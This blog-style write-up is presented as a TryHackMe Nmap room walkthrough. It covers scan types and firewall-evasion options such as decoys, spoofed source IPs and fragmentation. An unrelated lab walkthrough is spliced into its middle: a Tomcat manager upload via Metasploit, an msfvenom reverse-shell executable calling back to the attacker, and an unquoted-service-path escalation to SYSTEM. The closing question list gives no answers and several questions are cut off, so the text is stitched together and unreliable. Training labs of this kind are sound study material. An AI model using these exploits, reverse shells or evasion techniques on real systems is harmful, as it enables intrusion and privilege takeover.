Summary
In this post, we covered Nmap scanning commands and techniques from beginners to advanced. We explained TCP connect scan, stealth scan, UDP scan, ACK scan, Decoy scan, Fragmented scan,etc. This was part of TryHackMe Junior Penetration Tester pathway.
This post covers the answers for
Challenge Description
When we want to target a network, we want to find an efficient tool to help us handle repetitive tasks and answer the following questions:
- Which systems are up?
- What services are running on these systems?
The tool that we will rely on is Nmap. The first question about finding live computers is answered in this room. This room is the first in a series of four rooms dedicated to Nmap. The second question about discovering running services is answered in the next Nmap rooms that focus on port-scanning.
Initial Reconnaissance and Web Exploitation
I started by running an Nmap scan to identify open ports on the target machine. My scan revealed several open ports, including 80 (HTTP), 135 (RPC), 139 (NetBIOS), 445 (SMB), and 8080 (HTTP). The presence of ports 135, 139, and 445 immediately told me it was a Windows machine.
I then navigated to the website on port 80, which was a static page. However, when I checked port 8080, I found a web server running Apache Tomcat/8.5.31. This was a promising lead! I noticed that the default Tomcat page was displayed, which often includes a “Manager App” link.
I tried to access the /manager/html
directory, but it required authentication. This is a common scenario, so I decided to look for default credentials or vulnerabilities in Tomcat. I remembered that Tomcat versions can sometimes be vulnerable to specific exploits.
I used Metasploit’s exploit/multi/http/tomcat_mgr_upload
module to try and gain access. This module attempts to upload a malicious .war
file (Web Application Archive) to the Tomcat Manager. I set the RHOSTS
to the target IP, RPORT
to 8080, and LHOST
to my attacking machine’s IP. I also needed to set LPORT
for my reverse shell. After running the exploit, it successfully uploaded the .war
file and gave me a meterpreter session!
- Commands in Metasploit:
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <TARGET_IP>
set RPORT 8080
set LHOST <YOUR_IP>
set LPORT 4444
(or any chosen port)exploit
Initial Foothold and User Flag
Once I had the meterpreter session, I could interact with the compromised system. I used the shell
command to drop into a Windows command prompt.
- Command in Meterpreter:
shell
From the command prompt, I wanted to find the user flag. I navigated to the Users
directory and then to the bill
user’s desktop.
- Commands in Windows Shell:
cd Users
cd bill
cd Desktop
type user.txt
(This command is used to display the contents ofuser.txt
, revealing the user flag.)
Privilege Escalation
Now that I had the user flag, my next objective was to escalate privileges to administrator. I needed to find a vulnerability that would allow me to move from the bill
user to a higher-privileged account.
I used systeminfo
to gather information about the system, specifically the OS version and installed hotfixes.
- Command in Windows Shell:
systeminfo
I then transferred winPEAS.exe
(a privilege escalation enumeration tool) to the target machine using the upload
command in Meterpreter.
- Command in Meterpreter:
upload /path/to/your/winPEAS.exe C:\\Users\\bill\\Desktop\\winPEAS.exe
After running winPEAS.exe
on the target, it highlighted a potential vulnerability related to unquoted service paths. This is a common issue where a service executable’s path isn’t enclosed in quotes, allowing an attacker to inject their own executable if they can write to a directory within that path.
- Command in Windows Shell (to run winPEAS):
C:\Users\bill\Desktop\winPEAS.exe
I identified the AdvancedSystemCareService9 as having an unquoted path. Its path was C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
. This meant I could potentially place a malicious executable named Program.exe
in C:\Program Files (x86)\IObit\
and it would be executed when the service started.
I generated a malicious .exe
payload using msfvenom
to get a reverse shell as a higher-privileged user.
- Command in Kali Linux:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=5555 -f exe -o Program.exe
I then uploaded this Program.exe
to C:\Program Files (x86)\IObit\
on the target machine using Meterpreter’s upload
command.
- Command in Meterpreter:
upload /path/to/your/Program.exe "C:\\Program Files (x86)\\IObit\\Program.exe"
Before restarting the service, I set up a new multi/handler in Metasploit to catch the incoming shell from my malicious Program.exe
.
- Commands in Metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
set LPORT 5555
exploit
Finally, I restarted the AdvancedSystemCareService9
service. This caused my Program.exe
to execute, and I caught a new meterpreter session, this time as NT AUTHORITY\SYSTEM (full administrator privileges)!
- Command in Windows Shell (to restart service):
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
Root Flag Retrieval
With full system access, I could now retrieve the root flag. I navigated to the Administrator’s desktop.
- Commands in new Meterpreter session:
shell
cd C:\Users\Administrator\Desktop
type root.txt
(This command displayed the contents ofroot.txt
, revealing the root flag.)
This challenge was a great exercise in combining web exploitation with Windows privilege escalation techniques. I just finished watching a video that dives deep into Nmap scanning techniques, revisiting the Junior Penetration Tester pathway on TryHackMe. I focused on the practical commands and concepts rather than just the theory. Here’s a breakdown of what I covered:
Nmap Scanning Techniques
TCP Connect Scan (-sT
)
This is the default scan type if I’m not running as root. It completes the full TCP three-way handshake, making it easily detectable by firewalls and administrators. It doesn’t require elevated privileges.
- Command:
nmap -sT [IP_ADDRESS]
Stealth Scan / SYN Scan (-sS
)
This scan requires root privileges. It’s considered stealthier because it doesn’t complete the full TCP handshake. Instead, after receiving a SYN-ACK, it sends a RST packet to tear down the connection.
- Command:
sudo nmap -sS [IP_ADDRESS]
UDP Scan (-sU
)
I use this to scan UDP ports. It’s trickier to determine port status with UDP because it’s connectionless. If a port is closed, the target usually responds with an ICMP “port unreachable” message. If there’s no response, the port is considered open or filtered.
- Command:
nmap -sU [IP_ADDRESS]
ornmap -sU -F [IP_ADDRESS]
(for a faster scan of common ports).
Timing (-T
)
This option controls the speed of the scan. Options range from -T0
(paranoid, very slow for IDS/firewall evasion) to -T5
(insane, very fast and noisy). I can also use --min-rate
and --max-rate
to control packets per second.
Null Scan (-sN
)
This sends TCP packets with no flags set. If a port is open or filtered, there’s no response. If it’s closed, the target sends a RST packet.
- Command:
nmap -sN [IP_ADDRESS]
FIN Scan (-sF
)
Similar to a Null scan, this sends TCP packets with only the FIN flag set. It behaves similarly in terms of responses for open/filtered and closed ports.
- Command:
nmap -sF [IP_ADDRESS]
Xmas Scan (-sX
)
This sends TCP packets with FIN, PSH, and URG flags set. Like Null and FIN scans, its behavior helps in understanding firewall rules.
- Command:
nmap -sX [IP_ADDRESS]
ACK Scan (-sA
)
I use this to map out firewall rule sets by sending TCP packets with only the ACK flag set. The target should always respond with a RST packet. Nmap considers a port “unfiltered” if a RST is received, and “filtered” if no response comes back.
- Command:
nmap -sA [IP_ADDRESS]
Window Scan (-sW
)
Similar to the ACK scan, this can sometimes differentiate open ports from closed ones by examining the TCP window field in the returned RST packet.
- Command:
nmap -sW [IP_ADDRESS]
Custom TCP Scan Flags (--scanflags
)
This allows me to specify custom TCP flags. For example, to set only the RST flag:
- Command:
nmap --scanflags RST [IP_ADDRESS]
Firewall Evasion Techniques
I explored several ways to evade firewalls:
- Fragmentation (
-f
,-ff
): Splits the TCP header into smaller packets.-f
uses 8-byte fragments,-ff
uses 16-byte fragments.- Command:
nmap -sS -T1 -f [IP_ADDRESS]
- Command:
nmap -ff [IP_ADDRESS]
- Command:
- Decoy Scan (
-D
): Makes the scan appear to originate from multiple IP addresses.- Command:
nmap -D RND:10 [IP_ADDRESS]
(uses 10 random IPs) - Command:
nmap -D decoy_ip1,decoy_ip2,ME [IP_ADDRESS]
(ME represents my actual IP)
- Command:
- Spoof Source IP (
-S
): Makes the scan appear to come from a single, specific spoofed IP. This requires being on the same network or using a sniffer on the spoofed host to see results.- Command:
nmap -e [INTERFACE] -Pn -S spoofed_ip [TARGET_IP]
- Command:
- Spoof MAC Address (
--spoof-mac
): Used to change the source MAC address. - Source Port Specification (
--source-port
or-g
): Specifies the source port Nmap uses. - Idle Scan (
-sI
): A very stealthy scan that bounces off a “zombie” host. - Changing User Agent (
--script-args http.useragent="USER_AGENT_STRING"
): Can be used with HTTP scripts to change the user agent.- Command:
nmap -sV --script http-headers --script-args http.useragent="Googlebot" [IP_ADDRESS]
- Command:
Service and OS Detection
- Service Version Detection (
-sV
): Attempts to determine the version of services running on open ports. It completes the TCP three-way handshake, so it doesn’t work with stealth scans (-sS
) by default. I can control its intensity with--version-intensity [0-9]
or use--version-light
.- Command:
nmap -sV [IP_ADDRESS]
- Command:
- OS Detection (
-O
): Attempts to identify the operating system of the target by fingerprinting its TCP/IP stack characteristics.- Command:
nmap -O [IP_ADDRESS]
- Command:
Nmap Scripting Engine (NSE)
The Nmap Scripting Engine (NSE) uses Lua scripts to extend Nmap’s functionality for tasks like vulnerability scanning, brute-forcing, and advanced discovery. Scripts are located in /usr/share/nmap/scripts/
.
- Default scripts (
-sC
or--script default
): Runs a safe set of default scripts.- Command:
nmap --script default [IP_ADDRESS]
- Command:
nmap -sC [IP_ADDRESS]
- Command:
- Specific script: I can run a specific script by name.
- Example:
nmap --script ssh2-enum-algos [IP_ADDRESS]
- Example:
- I used
ls /usr/share/nmap/scripts/ | grep robots
to find a script related torobots.txt
andls /usr/share/nmap/scripts/ | grep 2020-0712
for a specific CVE.
Saving Output
Finally, I learned how to save Nmap’s output in various formats:
- Normal format (
-oN
): Human-readable.- Command:
nmap -sV [IP_ADDRESS] -oN output.nmap
- Command:
- Grepable format (
-oG
): Easy to parse with tools likegrep
.- Command:
nmap -sV [IP_ADDRESS] -oG output.gnmap
- I used
cat scans.gnmap | grep https
andcat scans.gnmap | grep 8089
to filter results.
- Command:
- XML format (
-oX
): Useful for processing with other programs.- Command:
nmap -sV [IP_ADDRESS] -oX nmap.xml
- Command:
- All formats (
-oA
): Saves in all three formats using the same base filename.
I’ll be moving on to the “Protocols and Servers” rooms next to complete the Junior Penetration Tester track!
TryHackMe Nmap Answers
10.10.12.13/29
as your target?How many IP addresses will Nmap scan if you provide the following range 10.10.0-255.101-125
?
Send a packet with the following:
- From computer1
- To computer3
- Packet Type: “Ping Request”
What is the type of packet that computer1 sent before the ping?
What is the type of packet that computer1 received before being able to send the ping?
How many computers responded to the ping request?
Send a packet with the following:
- From computer2
- To computer5
- Packet Type: “Ping Request”
What is the name of the first device that responded to the first ARP Request?
What is the name of the first device that responded to the second ARP Request?
Send another Ping Request. Did it require new ARP Requests? (Y/N)
We will be sending broadcast ARP Requests packets with the following options:
- From computer1
- To computer1 (to indicate it is broadcast)
- Packet Type: “ARP Request”
- Data: try all the possible eight devices (other than computer1) in the network: computer2, computer3, computer4, computer5, computer6, switch1, switch2, and router.
How many devices are you able to discover using ARP requests?
What is the option required to tell Nmap to use ICMP Address Mask to discover live hosts?
What is the option required to tell Nmap to use ICMP Echo to discover life hosts?
Which service uses TCP port 22 by default?
How many port states does Nmap consider?
Which port state is the most interesting to discover as a pentester?
Which flag needs to be set when you initiate a TCP connection (first packet of TCP 3-way handshake)?
nmap -sT MACHINE_IP
via the terminal. A new service has been installed on this VM since our last scan. Which port number was closed in the scan above but is now open on this target VM?What is Nmap’s guess about the newly installed service?
nmap -sS MACHINE_IP
. What is the new open port?What is Nmap’s guess of the service name?
nmap -sU -F -v MACHINE_IP
. A new service has been installed since the last scan. What is the UDP port that is now open?What is the service name according to Nmap?
How can you ensure that Nmap will run at least 64 probes in parallel?
What option would you add to make Nmap very slow and paranoid?
In a FIN scan, how many flags are set to 1?
In a Xmas scan, how many flags are set to 1?
Start the VM and load the AttackBox. Once both are ready, open the terminal on the AttackBox and use nmap to launch a FIN scan against the target VM. How many ports appear as open|filtered?
Repeat your scan launching a null scan against the target VM. How many ports appear as open|filtered?
You decided to experiment with a custom TCP scan that has the reset flag set. What would you add after --scanflags
?
The VM received an update to its firewall ruleset. A new port is now allowed by the firewall. After you make sure that you have terminated the VM from Task 2, start the VM for this task. Launch the AttackBox if you haven’t done that already. Once both are ready, open the terminal on the AttackBox and use Nmap to launch an ACK scan against the target VM. How many ports appear unfiltered?
What is the new port number that appeared?
Is there any service behind the newly discovered port number? (Y/N)
sudo nmap MACHINE_IP
to make the scan appear as if coming from the source IP address 10.10.10.11
instead of your IP address?What do you need to add to the command sudo nmap MACHINE_IP
to make the scan appear as if coming from the source IP addresses 10.10.20.21
and 10.10.20.28
in addition to your IP address?
-ff
option is being used, how many IP fragments will you get?10.10.5.5
, and you decide to use it as a zombie in your idle scan. What argument should you add to your Nmap command?nmap -sS -F --reason MACHINE_IP
to scan the VM. What is the reason provided for the stated port(s) being open?Start the target machine for this task and launch the AttackBox. Run nmap -sV --version-light MACHINE_IP
via the AttackBox. What is the detected version for port 143?
--version-light
?/usr/share/nmap/scripts
on the AttackBox. What does the script http-robots.txt
check for?Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-2015-1635)?
Launch the AttackBox if you haven’t already. After you ensure you have terminated the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC
against MACHINE_IP
. You will notice that there is a service listening on port 53. What is its full version value?
Based on its description, the script ssh2-enum-algos
“reports the number of algorithms (for encryption, compression, etc.) that the target SSH2 server offers.” What is the name of the key exchange algorithms (kex_algorithms) that relies upon “sha1” and is supported by MACHINE_IP
?
Terminate the target machine of the previous task and start the target machine for this task. On the AttackBox terminal, issue the command scp pentester@MACHINE_IP:/home/pentester/* .
to download the Nmap reports in normal and grepable formats from the target virtual machine.
Note that the username pentester
has the password THM17577
Check the attached Nmap logs. How many systems are listening on the HTTPS port?
What is the IP address of the system listening on port 8089?